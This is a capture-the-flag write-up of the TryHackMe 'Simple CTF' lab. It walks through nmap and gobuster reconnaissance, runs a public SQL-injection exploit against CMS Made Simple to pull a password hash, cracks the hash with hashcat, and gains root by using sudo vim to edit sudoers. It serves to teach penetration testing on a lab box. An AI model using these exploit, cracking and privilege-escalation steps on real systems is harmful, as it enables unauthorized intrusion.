This is one of the simple machines on TryHackMe, and it’s a guided CTF. Here I show the write-up of the machine resolution — I won’t include the answered questions, just the process.

Link to the machine: https://tryhackme.com/room/easyctf

Reconnaissance

A full service scan is performed on the machine using nmap.

sudo nmap 10.10.124.41 -sSV -p- -T5 --min-rate 50000 -Pn -n
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-04 06:35 CEST
Nmap scan report for 10.10.124.41
Host is up (0.054s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.78 seconds

Several services are detected: ftp, httpd, and ssh on port 2222.

Under normal circumstances, the proper approach would be to review each service version and search for known vulnerabilities, but this machine is designed to guide you along the way.

We visit the URL “http://machine_ip/” and find a default Apache page.

Discovery with Gobuster

gobuster dir -u "http://10.10.124.41/" -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.124.41/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 291]
/.htaccess            (Status: 403) [Size: 296]
/.htpasswd            (Status: 403) [Size: 296]
/index.html           (Status: 200) [Size: 11321]
/robots.txt           (Status: 200) [Size: 929]
/server-status        (Status: 403) [Size: 300]
/simple               (Status: 301) [Size: 313] [--> http://10.10.124.41/simple/]
Progress: 4746 / 4747 (99.98%)
===============================================================
Finished
===============================================================

In the /simple directory there seems to be a CMS installed: “CMS Made Simple”

This site is powered by CMS Made Simple version 2.2.8

A second directory discovery is performed with gobuster, and some admin panel login URLs are found — interesting for brute force or SQL injection attacks…

gobuster dir -u "http://10.10.124.41/simple/" -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.124.41/simple/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 303]
/.hta                 (Status: 403) [Size: 298]
/admin                (Status: 301) [Size: 319] [--> http://10.10.124.41/simple/admin/]
/assets               (Status: 301) [Size: 320] [--> http://10.10.124.41/simple/assets/]
/doc                  (Status: 301) [Size: 317] [--> http://10.10.124.41/simple/doc/]
/index.php            (Status: 200) [Size: 19913]
/lib                  (Status: 301) [Size: 317] [--> http://10.10.124.41/simple/lib/]
/modules              (Status: 301) [Size: 321] [--> http://10.10.124.41/simple/modules/]
/tmp                  (Status: 301) [Size: 317] [--> http://10.10.124.41/simple/tmp/]
/uploads              (Status: 301) [Size: 321] [--> http://10.10.124.41/simple/uploads/]
Progress: 4746 / 4747 (99.98%)
===============================================================
Finished

Exploit

After researching the CMS and its version, a known CVE and an exploit are found at the following links:

• CVE: https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2019-9053
• Exploit: https://www.exploit-db.com/exploits/46635

We proceed to download the Python script and get it running. The first thing I notice is that the script is written in Python 2, while nowadays Python 3 is used (and it’s the one I have installed).

python 46635.py -u "http://10.10.124.41/simple/"                             1 ↵ zft
  File "/home/jade/thm/simplectf/46635.py", line 25
    print "[+] Specify an url target"
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

Here you realize that the issue is that it’s using Python 2, because one of the most notable changes was the behavior of print.

Two options: either modify the code to make it Python 3 compatible (with AI or manually), or use Python 2.

I went with the second option.

In my case, I’m using Arch Linux and had to install the following packages:

sudo pacman -Sy python2 python2-requests python2-termcolor

We run the script:

python 46635.py -u "http://10.10.124.41/simple/"

#result
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96

We now have the salt and the password. The script itself gives you the option to use a dictionary to try cracking the password, but after testing it, it doesn’t seem to work… correctly.

After some attempts with John The Ripper using different formats… it just wouldn’t work.

So I decided to use Hashcat, knowing that the encryption is MD5.

echo "0c01f4468bd75d7a84c7eB73846e8d96:1dac0d92e9fa6bb2" > hash.txt

hashcat -m 20 -a 0 hash.txt ../rockyou.txt

And the password is: ‘secret’

Another approach would have been to brute-force SSH with hydra using the username mitch.

We now have credentials. We check the CMS backend at http://10.10.124.41/simple/admin/login.php but don’t find anything interesting.

We log in via SSH on port 2222. Keep in mind that if you use the ssh command without specifying the port, it will default to port 22 and won’t work.

Privilege Escalation

For privilege escalation I needed some help from here: https://derek-toohey19.medium.com/tryhackme-simple-ctf-walkthrough-bd05cca1073f

I don’t have the privilege escalation part as well practiced for now…

We quickly switch to a bash shell to improve the experience and check the permissions.

mitch@Machine:~$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Apparently, VIM can be used to execute commands, and it can be run with sudo.

The simplest method I found to escalate privileges is to do the following:

sudo vim

#inside vim
:!visudo

#Add the following
mitch ALL=(ALL:ALL) ALL

# Save and exit

This way we’re giving the user mitch the ability to run sudo on behalf of any user.

sudo su

#PWN3D